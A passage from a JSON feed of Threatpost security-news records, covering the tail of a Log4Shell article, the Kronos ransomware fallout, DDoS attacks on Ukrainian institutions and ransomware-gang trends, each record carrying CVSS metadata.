[Google](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Google.md>)\n * [JD](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/JD.md>)\n * [LinkedIn](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/LinkedIn.md>)\n * [NetEase](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/NetEase.md>)\n * [Speed camera LOL](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/SpeedCamera.md>)\n * [Steam](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Steam.md>)\n * [Tesla](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tesla.md>)\n * [Tencent](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tencent.md>)\n * [Twitter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Twitter.md>)\n * [VMWare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md>)\n * [VMWarevCenter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWarevCenter.md>)\n * [Webex](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Webex.md>)\n\n## A Deep Dive and Other Resources\n\n * **Immersive Labs** has posted a[ hands-on lab](<https://www.linkedin.com/posts/immersive-labs-limited_in-december-a-zero-day-vulnerability-affecting-activity-6876088019028336640-MtYh>) of the incident.\n * **Lacework** has published a [blog post ](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) regarding how the news affects security best practices at the developer level.\n * **NetSPI** has published a [blog post](<https://www.netspi.com/blog/executive/security-industry-trends/log4j-zero-day-vulnerability-impact/>) that includes details on Log4Shell\u2019s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.\n\nThis is a developing story \u2013 stay tuned to Threatpost for ongoing coverage.\n\n121321 13:32 UPDATE 1: Added input from 
Dor Dali and Luke Richards. \n121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. 
\n_** \n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:14:46", "type": "threatpost", "title": "Log4Shell Is Spawning Even Nastier Mutations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:14:46", "id": "THREATPOST:34D98758A035C36FED68DDD940415845", "href": "https://threatpost.com/apache-log4j-log4shell-mutations/176962/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Remember when Kronos, the workforce-management workhorse, got [whacked](<https://threatpost.com/kronos-ransomware-outage-payroll-chaos/176984/>) by ransomware in December, right in time to gum up end-of-year HR busywork such as bonuses and vacation tracking?\n\nCould take days to crawl back, Ultimate Kronos Group (UKG) 
[said](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) at the time. Or, then again, could take up to several weeks, it said in a subsequent [update](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>).\n\nIt turns out that dragging its Kronos Private Cloud (KPC) systems back has taken nearly two months. As of Jan. 22, it wasn\u2019t yet done dragging them back, but aggrieved customers had started the process of dragging the company into court as scheduling and payroll were disrupted at [thousands of employers](<https://www.shrm.org/resourcesandtools/hr-topics/technology/pages/ukg-ransomware-disrupts-scheduling-payroll-kronos-private-cloud.aspx>) \u2013 [including hospitals](<https://www.npr.org/2022/01/15/1072846933/kronos-hack-lawsuits>) \u2013 many of which have been forced to log hours manually.\n\nAs NPR reported on Jan. 15, some 8 million people experienced \u201cadministrative chaos\u201d following the attack, including tens of thousands of public transit workers in the New York City metro area, public service workers in Cleveland, employees of FedEx and Whole Foods, and \u201cmedical workers across the country who were already dealing with an omicron surge that has filled hospitals and exacerbated worker shortages.\u201d\n\n020722 18:31 UPDATE: Sportswear manufacturer Puma was one of two UKG customers whose employees\u2019 personally identifying information (PII) \u2013 including their Social Security Numbers (SSNs) \u2013 was stolen by attackers. See below for more details.\n\n020822 10:55 UPDATE: A UKG spokesperson reached out to Threatpost to clarify that the September Puma breach, which resulted in stolen source code, was unrelated to UKG\u2019s December ransomware attack on Kronos Private Cloud. UKG subsequently discovered that Puma was one of two customers who had employee PII compromised as a result of the ransomware attack. 
Puma was a Kronos Private Cloud customer, and the affected employees and their dependents are in the process of being notified, he said.\n\n## Furious and Filing Suits\n\nAs far as UKG\u2019s gratitude for customers\u2019 patience goes, it might be a little aspirational.\n\nCustomers were already seething over the company\u2019s lack of communication as the weekend unwound following the Saturday, Dec. 11 discovery of the attack. They [complained](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>) [about](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) poor communication, a lack of information about whether their data was still out there somewhere, that the company\u2019s portal and support site had gone AWOL right in the thick of things, and that the \u201cweeks\u201d or \u201cdelays\u201d to restore systems was insupportable.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03172618/Kronos-customers-fuming-e1643927213846.jpg>)\n\nKronos customers\u2019 complaints. 
Source: Kronos Community Forum.\n\nThe subsequent lawsuits include a [class action](<https://www.classaction.org/news/new-york-mta-employees-owed-unpaid-overtime-following-kronos-data-breach-lawsuit-alleges>) filed by New York transit workers claiming that the Metropolitan Transportation Authority has \u201cfailed to pay certain employees any overtime wages since their payroll administrator was crippled by a December 2021 data breach.\u201d\n\nWorkers at Tesla and PepsiCo have also brought separate [lawsuits](<https://searchhrsoftware.techtarget.com/news/252512253/Tesla-PepsiCo-workers-bring-lawsuit-over-UKG-payroll-outage#:~:text=Lawsuits%20over%20the%20ransomware%20attack,inaccurate%20pay%20during%20the%20outage.&text=Two%20workers%2C%20one%20at%20Telsa%20Inc.&text=subsidiary%2C%20are%20suing%20the%20Ultimate,short%20of%20what%20they%20earned.>) over the UKG payroll outage, claiming that they received inaccurate pay during the outage.\n\nAs well, at the end of December, West Virginia\u2019s state auditor, J.B. McCuskey [promised](<https://wvmetronews.com/2021/12/31/mccuskey-promises-lawsuit-against-state-contractor-if-damages-for-payroll-problems-are-left-unpaid/>) that \u201cwe\u2019re going to hold Kronos accountable\u201d for what he called the \u201creal pain in the rear end\u201d of having to manually input information for more than 37,000 state employees before they got their first paychecks of 2022.\n\n020722 17:54 UPDATE: UKG didn\u2019t respond to Threatpost\u2019s inquiries regarding when it expects all of its systems to be fully restored. 
On Thursday evening, a company spokesperson pointed Threatpost to an [FAQ](<https://www.ukg.com/KPCupdates/kpc-faq>) that states that the company is working with Mandiant and West Monroe \u201cto test and continually harden our environment.\u201d\n\nThe company has identified \u201ca relatively small volume of data that was exfiltrated\u201d \u2013 data that included the personal details of two customers\u2019 employees. Both affected customers have been notified, it said.\n\nIn September, The Record [reported](<https://therecord.media/hackers-stole-puma-source-code-no-customer-data-company-says/>) that one of those customers was Puma, the sportswear manufacturer. The attackers stole source code, according to The Record. As of late August, they were trying to extort the company into paying ransom for it, threatening to release the files on a leak site if the German company didn\u2019t pay up.\n\n020822 10:44 UPDATE: The two incidents \u2013 Puma\u2019s September breach and the attack on UKG, which provides services to Puma \u2013 are unrelated, contrary to what Threatpost erroneously reported in an earlier update.\n\nAs [BleepingComputer](<https://www.bleepingcomputer.com/news/security/puma-hit-by-data-breach-after-kronos-ransomware-attack/>) reported on Monday after having dug up breach notification letters filed with several state attorneys general, the [breach notification](<https://apps.web.maine.gov/online/aeviewer/ME/40/10394643-6f4e-49ff-884a-9977602932a9.shtml>) UKG filed with the Office of the Maine Attorney General indicated that personal information belonging to Puma employees and their dependents was involved in the breach.\n\nPuma was one of two customers who had employee PII compromised as a result of that incident. 
Puma was a Kronos Private Cloud customer, and affected employees are in the process of being notified \u2013 hence the filing with the Maine AG\u2019s office.\n\nThat same letter said that data belonging to a total of 6,632 individuals were affected in the UKG breach, including SSNs.\n\n## Customers No Longer Using Pen and Paper\n\nUKG\u2019s core services were restored as of Jan. 22. That leaves \u201ccertain supplementary customer applications\u201d still to be restored. But at this point, customers are no longer using pen and paper for payroll, employee scheduling and other critical functions.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T23:08:49", "type": "threatpost", "title": "Kronos Still Dragging Itself Back From Ransomware Hell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T23:08:49", "id": 
"THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "href": "https://threatpost.com/kronos-dragging-itself-back-ransomware-hell/178213/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:54", "description": "On Tuesday, institutions central to Ukraine\u2019s military and economy were hit with a wave of denial-of-service (DoS) attacks, which sparked an avalanche of headlines around the world. The strike itself had limited impact \u2014 but the larger implications for critical infrastructure beyond the Ukraine are worth noting, researchers said.\n\nThe targets were core entities to Ukraine: the Armed Forces of Ukraine, the Ministry of Defense, Oschadbank (the State Savings Bank) and Privatbank, the country\u2019s largest commercial bank, servicing nearly [20 million](<https://en.privatbank.ua/about>) customers. Oschadbank and Privatbank are considered \u201c[systemically important](<https://bank.gov.ua/en/news/all/natsionalniy-bank-onoviv-perelik-sistemno-vajlivih-bankiv>)\u201d to Ukraine\u2019s financial markets.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nAdam Meyers, senior vice president of intelligence at CrowdStrike, said via email that the attacks consisted of \u201ca large volume of traffic, three orders of magnitude more than regularly observed traffic, with 99 percent of this traffic consisting of HTTPs requests.\u201d\n\n## **What Happened?**\n\nBy overloading targeted servers, this kind of DoS attack ensured that end users couldn\u2019t access their websites, bank accounts and so on for a period of time. 
As Ukraine\u2019s Center for Strategic Communications noted in a Facebook [post](<https://www.facebook.com/StratcomCentreUA/posts/290808713119116>), some Privatbank customers found themselves \u201ccompletely unable to access\u201d the company\u2019s app, while others\u2019 accounts \u201cdo not reflect balance and recent transactions.\u201d\n\nSome customers received SMS messages claiming that ATMs were out of order, according to Ukraine\u2019s Cyberpolice, which [tweeted](<https://twitter.com/CyberpoliceUA/status/1493578811492950020>) the claim. Those reports however were debunked, [according to](<https://www.npr.org/2022/02/15/1080876311/ukraine-hack-denial-of-service-attack-defense>) NPR.\n\nCrucially, the attackers disrupted the _availability _of these websites and services, but not the _integrity _of any data. Thus, the transactions, balances and private information associated with bank accounts and military databases appear to be untainted, according to reports.\n\n[And, according](<https://cip.gov.ua/en/news/shodo-kiberataki-na-saiti-viiskovikh-struktur-ta-derzhavnikh-bankiv>) to Ukraine\u2019s State Special Communications Service, a \u201cworking group of experts\u201d convened yesterday to take \u201call necessary measures to localize and resist the cyberattack.\u201d All affected banking services had resumed by 7:30 p.m. local time on Tuesday, and the websites for the Armed Forces and Ministry of Defense have since been restored.\n\n\u201cThe DDoS attacks against the Ukrainian defense ministry and financial institutions appear to be harassment similar to the previous DDoS attacks [seen in January](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>),\u201d Rick Holland, CISO at Digital Shadows, said via email. 
\u201cThey could be a precursor to a significant attack or a component of a broader campaign to intimidate and confuse Ukraine.\u201d\n\n## **Part of a Much Broader Campaign**\n\nWhile limited in impact, these events have come mere hours after the Security Service of Ukraine\u2019s (SSU) [reported](<https://ssu.gov.ua/en/novyny/zaiava-sbu-shchodo-proiaviv-hibrydnoi-viiny-v-informatsiinomu-prostori>) a \u201cmassive wave of hybrid warfare\u201d \u2013 [120](<https://ssu.gov.ua/en/novyny/u-sichni-2022-roku-sbu-zablokuvala-ponad-120-kiberatak-na-ukrainski-orhany-vlady>) cyberattacks against government authorities, and a fake news botnet of more than [18,000](<https://ssu.gov.ua/en/novyny/sbu-likviduvala-18ty-tysiachnu-botofermu-u-lvovi-pid-kuratorstvom-rf-siialy-paniku-ta-minuvaly-obiekty-video>) social-media accounts \u2013 all designed to \u201csystemically sow panic, spread fake information and distort the real state of affairs\u201d in the country.\n\nThe SSU attributed this wave of hostile activity to a single unnamed but obvious \u201caggressor state.\u201d\n\nLikewise, Tuesday\u2019s attacks have not been officially attributed. 
Still, their timing, as Russia mobilizes more than 100,000 troops at Ukraine\u2019s northeast border, is inspiring speculation.\n\n\u201cIt would be no surprise,\u201d wrote Mike McLellan, director of intelligence at SecureWorks, via email, \u201cif it transpires that they are the result of cyberattacks conducted by Russia, or by threat actors with a pro-Russian agenda.\u201d\n\nHe added, \u201cRussia has a history of cyberattacks designed to distract the Ukrainian government and critical infrastructure operators and undermine the trust among the Ukrainian population.\u201d\n\nAnd indeed, in the past two months, Russian advanced persistent threats (APTs) have been tied to an [attack](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>) on 70 Ukrainian government websites, a [wiper](<https://threatpost.com/destructive-wiper-ukraine/177768/>) targeting government, non-profit and IT organizations, and increased [attacks and espionage](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>) against military targets.\n\nIt\u2019s also worth noting that the 2014 Russian invasion of Crimea [coincided with](<https://resources.infosecinstitute.com/topic/crimea-russian-cyber-strategy-hit-ukraine/>) an outbreak of the [Turla virus](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>), and targeted espionage attacks against government agencies, politicians and businesses.\n\nOthers, however, noted that there could be many beneficiaries to the fog of potential war.\n\n\u201cWhat could be a more likely scenario [than Russia carrying out the attacks] is that other countries like China and Iran take advantage of the chaos and fog of war to further their interests and conduct their campaigns against the West,\u201d Holland noted. 
\u201cAs the saying goes, \u2018never let a good crisis go to waste.\u2019 The risk of these types of false-flag operations could have unintended consequences, and you can\u2019t close Pandora\u2019s Box once it\u2019s opened.\u201d\n\nTim Wade, technical director and deputy CTO at Vectra, cautioned against hasty attribution.\n\n\u201cThere are no shortage of actors that could stand to benefit from chaos or disruption \u2013 ranging from criminal actors to nation states \u2013 and that, unlike Hollywood movies, real motivations can be tricky to unwind,\u201d he said via email.\n\n## **Could Ukraine\u2019s Problems Migrate West?**\n\nBesides the direct threat to Ukrainians, increasing cyber-disruption in the region could spill over to affect American and European countries and businesses.\n\nPrior attacks against Ukrainian targets have crippled companies that simply do business or passively interact with Ukrainian organizations. Famously, the 2017 [NotPetya malware](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) that breached a Kiev-based accounting software vendor ended up causing [billions of dollars of damage](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) to multinational corporations like Maersk, Merck and FedEx.\n\nGovernment officials have been warning of the potential for similar attacks directed at the United States government and its critical industries. A January [bulletin](<https://info.publicintelligence.net/DHS-UkraineInvasionCyberAttacks.pdf>) from the Department of Homeland Security (DHS) concluded that \u201cRussia would consider initiating a cyberattack against the Homeland if it perceived a U.S. 
or NATO response to a possible Russian invasion of Ukraine threatened its long-term national security.\u201d\n\nThe [_DHS and FBI this week also warned_](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUfnCpRAdaEZ-2Fzb6CvhwO2WfCysAcwxa-2FOx6Xho58-2BYfSYyLoJDjBKk191ALVSfQe7tKhtpt14nvCWvRWtjQ5ia-2Bxy-2FAHNuEWnCoDD4HJMf8OJPniUjq-2B73i7hrTuhggh8r40SSt8yAJN6BeVN-2BkmdzRhazj8-2BjAsse8M0ns4vlmM4yK8nCFV0oUzvOT01MzpXw-3D-3DEQ6l_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2JxQFydFAQqAST8UQ4mPJ45BLqxiPCRq-2F8g1sIIIifFF67f6vand8CQnio175DMlDx-2BtZjU9X-2BUnk00U6HL2Yt4yyDbwA5dz19QLe0tu0POPLp-2Fgsr5OJD90lYAoTgrjHLrtnapc4YpMEy1t1oB-2FDSc0tf3yxTecOYhCatjqqOm4kJQYHeuGl-2BEr4Nvd1gCZbw27qOfv2B-2BBdgMuXjXMnP622px6wYmsEQxT8XmTUE4Kp48bq-2BYS-2BZ-2BxIiX-2Fk3HtqWfdoiM23ih4UUMDkfkykO0-3D>) of an uptick in Russian scanning of domestic law-enforcement networks and other American targets.\n\nSecurity researchers noted that it\u2019s important to be wary as the geo-political tensions continue \u2014 given that the chaos that would arise from a full-blown Russian incursion would provide plenty of cover for cyberattackers of all stripes.\n\nAs Crowdstrike\u2019s Meyers said, \u201cwhile there is no evidence of any targeting of western entities at this time, there is certainly potential for collateral impact as a result of disruptive or destructive attacks targeting Ukraine \u2013 this could impact companies that have a presence in Ukraine, those that do business with Ukrainian companies, or have a supply chain component in Ukraine such as code development/offshoring.\u201d\n\nWould the U.S. be ready in such a scenario? Last week, DHS officials [_told American cities_](<https://www.usatoday.com/story/news/politics/2022/02/08/local-government-cybersecurity-digital-threats/9208951002/?gnt-cfr=1>) that they were extra-vulnerable to wipers that could result in polluting a water supply or crashing a power grid. 
And it\u2019s worth noting that, according to [data](<https://www.cyberseek.org/heatmap.html>) from Cyber Seek, 600,000 cybersecurity roles across the nation are currently vacant, meaning that many organizations are understaffed for incident response.\n\n\u201cAre these attacks part of nation-state aggression? Or criminal opportunists exploiting a tense situation? Or just entirely coincidental? While answering with any certainty may be tough, what isn\u2019t difficult is drawing clear line of sight to the significance of cyber-resilience as it relates to critical services and infrastructure,\u201d Vectra\u2019s Wade noted. \u201cToday, everyone operating something of value has a target on their back and we\u2019d all do well to prepare for the inevitability of the consequences of that fact.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T16:04:36", "type": "threatpost", "title": "Ukrainian DDoS Attacks Should Put US on Notice\u2013Researchers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T16:04:36", "id": 
"THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "href": "https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Law enforcement, C-suite executives and the cybersecurity community at-large have been laser-focused on stopping the expensive and disruptive barrage of ransomware attacks \u2014 and it appears to be working, at least to some extent. Nonetheless, recent moves from the LockBit 2.0 and BlackCat gangs, plus this weekend\u2019s hit on the Swissport airport ground-logistics company, shows the scourge is far from over.\n\nIt\u2019s more expensive and riskier than ever to [launch ransomware attacks,](<https://www.coveware.com/blog/2022/2/2/law-enforcement-pressure-forces-ransomware-groups-to-refine-tactics-in-q4-2021>) and ransomware groups have responded by mounting fewer attacks with higher ransomware demands, Coveware has reported, finding that the average ransomware payment in the fourth quarter of last year climbed by 130 percent to reach $322,168. Likewise, Coveware found a 63 percent jump in the median ransom payment, up to $117,116.\n\n## **Fewer Attacks, Bigger Ransom Demands **\n\n\u201cAverage and median ransom payments increased dramatically during Q4, but we believe this change was driven by a subtle tactical shift by ransomware-as-a-service (RaaS) operations that reflected the increasing costs and risks previously described,\u201d Coveware analysts said. 
\u201cThe tactical shift involves a deliberate attempt to extort companies that are large enough to pay a \u2018big game\u2019 ransom amount but small enough to keep attack operating costs and resulting media and law enforcement attention low.\u201d\n\nThat means ransomware groups have started to focus on small-to-medium sized businesses to avoid law-enforcement attention and publicity like what came with the [Colonial Pipeline attack](<https://threatpost.com/takeaways-colonial-pipeline-ransomware/166980/>) last year, Coveware added.\n\n## **Groups Looking to Lower Their Profile**\n\n\u201cThe proportion of companies attacked in the 1,000- to 10,000-employee count size increased from 8 percent in Q3 to 14 percent in Q4,\u201d the researchers found. \u201cThe average ransom payment in just this employee bucket was well north of one million dollars, which dragged the Q4 average and median amounts higher.\u201d\n\nThe Coveware team said it expects this trend will likely continue, led by the most prolific ransomware-as-a-service operators out there: Conti, LockBit 2.0 and Hive. Following splashy law-enforcement takedowns, including the [Russia\u2019s roundup of REvil members](<https://threatpost.com/russian-security-revil-ransomware/177660/>), Coveware predicted that these groups will try and keep a low profile.\n\n\u201cWhile all RaaS operations need to recruit affiliates, we expect groups to become more reserved in their public messaging and more careful about what companies they target,\u201d Coveware researchers added. 
\u201cThe lessons learned from the pipeline attack and the recent FSB arrests are likely to keep some of the more vibrant displays of public bravado in check.\u201d\n\nBut a lower profile doesn\u2019t mean ransomware operators aren\u2019t still honing their skills.\n\n## **BlackCat\u2019s Rebrand, Triple-Extortion Threat **\n\nBlackCat, also known as ALPHV, an upstart [RaaS operation](<https://www.tripwire.com/state-of-security/security-data-protection/blackcat-ransomware-what-you-need-to-know/>), is on the rise and rapidly recruiting affiliates, according to Tripwire\u2019s Graham Cluley, who explained that the group has started adding pressure for their victims to pay by not only stealing their data and threatening to release it, but also promising a crippling distributed denial-of-service (DDoS) should they refuse to pay \u2014 a ransomware tactic known as \u201c[triple extortion](<https://threatpost.com/ransomwares-swindle-triple-extortion/166149/>).\u201d\n\nFirst discovered by the MalwareHunterTeam, the operators of the [Rust-coded BlackCat](<https://www.bleepingcomputer.com/news/security/blackcat-alphv-ransomware-linked-to-blackmatter-darkside-gangs/>) ransomware call themselves ALPHV, but the MalwareHunterTeam dubbed them BlackCat after the image used on the payment page the victims must visit on Tor to pay, Bleeping Computer reported. The report also confirmed that BlackCat is essentially a re-brand, adding the group members have confirmed they were [previous members of the BlackMatter/DarkSide group](<https://www.bleepingcomputer.com/news/security/blackcat-alphv-ransomware-linked-to-blackmatter-darkside-gangs/>).\n\nLockBit 2.0 is another group adding pressure on its victims to pay with threats to release a company\u2019s customer data \u2014 and it hasn\u2019t been laying so low, either.\n\n> [ALERT] LockBit ransomware gang has announced Cryptocurrency Exchange \"paybito\" on the victim list. 
[pic.twitter.com/TTq4pv1SRP](<https://t.co/TTq4pv1SRP>)\n> \n> \u2014 DarkTracer : DarkWeb Criminal Intelligence (@darktracer_int) [February 3, 2022](<https://twitter.com/darktracer_int/status/1489343888653361154?ref_src=twsrc%5Etfw>)\n\nLockBit 2.0 recently took credit for breaching cryptocurrency exchange platform playbito.com, threat hunter DarkTracer tweeted. The researcher also posted a warning from LockBit 2.0 that the group will publish the personal data of more than 100,000 of the platform\u2019s users unless the ransom is paid by Feb. 21.\n\n\u201cCustomers from USA/WorldWide personal data, mail/hash, weak has algorithm,\u201d the message read. \u201cAdmins personal data, admin emails and hashes. If you want it buy it \u2014 contact us with TOX.\u201d\n\nThe following day, the FBI put out [indicators of compromise associated with LockBit 2.0](<https://www.ic3.gov/Media/News/2022/220204.pdf>) and asked anyone who thinks they might have been compromised by the group to contact the FBI Cyber Squad immediately.\n\n\u201cThe FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with the threat actors, Bitcoin wallet information, the decryptor file, and/or a benign sample of an encrypted file,\u201d the FBI alert said, adding that the department does not encourage paying ransoms, but understands business decisions need to be made to keep operations going.\n\n## **Swissport Attack: Ransomware Still Going Strong**\n\nBut even as ransomware operators are feeling new pressure, successful attacks are still being pulled off regularly.\n\nOver the weekend, Swissport was taken down by a [ransomware attack](<https://www.spiegel.de/netzwelt/web/swissport-hackerangriff-stoert-zeitweise-flugbetrieb-in-der-schweiz-a-44285ac8-ad73-42ea-b751-91559c2ff4c8>) which caused the delay of 22 flights out of Zurich, Switzerland, according to an airport spokeswoman who spoke 
with Der Spiegel.\n\n> \u26a0\ufe0fIT security incident at [#Swissport](<https://twitter.com/hashtag/Swissport?src=hash&ref_src=twsrc%5Etfw>) contained. Affected infrastructure swiftly taken offline. Manual workarounds or fallback systems secured operation at all times. Full system clean-up and restoration now under way. We apologize for any inconvenience.\n> \n> \u2014 Swissport (@swissportNews) [February 5, 2022](<https://twitter.com/swissportNews/status/1489903446966812676?ref_src=twsrc%5Etfw>)\n\nBottom line? For now, ransomware is here to stay, but evolving.\n\nThe latest research from Trellix suggests that moving forward in 2022, financial services are going to be bombarded with [ransomware attacks](<https://www.trellix.com/en-us/threat-center/threat-reports/jan-2022.html>). From the second to the third quarter of 2021, attacks on the finance and insurance sector increased by 21 percent, followed by just a 7 percent increase in healthcare attacks, the firm noted.\n\n\u201cIn the third quarter of 2021, high-profile ransomware groups disappeared, reappeared, reinvented, and even attempted to rebrand, while remaining relevant and prevalent as a popular and potentially devastating threat against an increasing spectrum of sectors,\u201d Trellix chief scientist Raj Samani said.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T22:09:27", "type": 
